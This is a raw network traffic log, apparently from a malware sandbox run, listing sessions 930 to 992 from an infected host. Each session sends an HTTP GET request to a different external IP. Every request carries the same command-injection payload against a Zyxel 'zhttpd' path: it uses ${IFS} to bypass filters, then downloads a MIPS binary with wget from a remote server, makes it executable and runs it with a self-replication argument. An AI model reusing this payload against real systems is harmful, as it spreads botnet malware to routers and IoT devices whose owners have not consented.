                                            Jan 14, 2024 15:50:27.213818073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            930192.168.2.2358788166.211.68.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213825941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            931192.168.2.234291042.18.109.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213840961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            932192.168.2.2354056192.226.51.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213891029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            933192.168.2.2352204170.168.251.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213907003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            934192.168.2.2358956165.246.221.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213912964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            935192.168.2.2350996170.32.3.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213933945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            936192.168.2.234394295.79.26.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213953018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            937192.168.2.2343538128.245.143.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214016914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            938192.168.2.235987680.183.205.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214030981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            939192.168.2.2356568171.180.111.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214057922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            940192.168.2.2345026202.102.47.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214066982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            941192.168.2.2358790198.178.15.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214092970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            942192.168.2.2343908196.233.85.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214121103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            943192.168.2.235583089.215.3.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214149952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            944192.168.2.235731458.118.154.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214173079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            945192.168.2.2345550119.163.215.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214189053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            946192.168.2.2340728115.156.222.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214226961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            947192.168.2.234677096.2.87.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214405060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            948192.168.2.2357282160.198.0.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214431047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            949192.168.2.235480080.43.111.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214446068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            950192.168.2.2358936160.118.19.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214468002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            951192.168.2.2349918162.5.147.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214498997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            952192.168.2.234715870.132.58.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214529991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            953192.168.2.233507489.124.99.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214536905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            954192.168.2.235558220.3.143.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214556932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            955192.168.2.2348074184.44.112.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214589119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            956192.168.2.2352138159.166.187.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214629889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            957192.168.2.2355862177.55.67.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214648008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            958192.168.2.2345840138.237.165.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214680910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            959192.168.2.234029238.36.246.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214709044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            960192.168.2.235680819.249.180.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214726925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            961192.168.2.2357426211.59.239.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214770079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            962192.168.2.236056893.145.47.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214792013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            963192.168.2.235617413.167.35.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214803934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            964192.168.2.2339800188.62.187.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214840889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            965192.168.2.233541882.4.112.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214862108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            966192.168.2.2352000172.68.38.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214893103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            967192.168.2.2349516184.237.215.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214931965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            968192.168.2.2348228171.77.79.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214947939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            969192.168.2.2360320175.114.112.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.214977980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            970192.168.2.2350492134.73.125.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215003967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            971192.168.2.2344926212.187.123.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215013981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            972192.168.2.234251046.116.19.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215035915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            973192.168.2.2352286114.82.66.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215060949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            974192.168.2.2346982157.251.86.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215101004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            975192.168.2.236061051.153.181.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215131044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            976192.168.2.235120673.88.133.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215173006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            977192.168.2.234169892.5.47.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215182066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            978192.168.2.233595292.136.184.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215226889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            979192.168.2.235158220.76.7.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215255022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            980192.168.2.233320698.124.162.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215282917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            981192.168.2.235917638.240.209.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215313911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            982192.168.2.2338708196.57.43.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215332031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            983192.168.2.2355448117.224.99.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215338945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            984192.168.2.2356448194.4.28.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215387106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            985192.168.2.2339000187.229.82.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215415001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            986192.168.2.2345180107.175.203.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215445995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            987192.168.2.2359298138.17.133.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215472937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            988192.168.2.2344730152.114.85.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215491056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            989192.168.2.234990853.199.111.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215529919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            990192.168.2.2352236195.241.22.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215560913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            991192.168.2.2354752114.199.223.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.215581894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            992192.168.2.2345684192.71.67.13443
                                            TimestampBytes transferredDirectionData
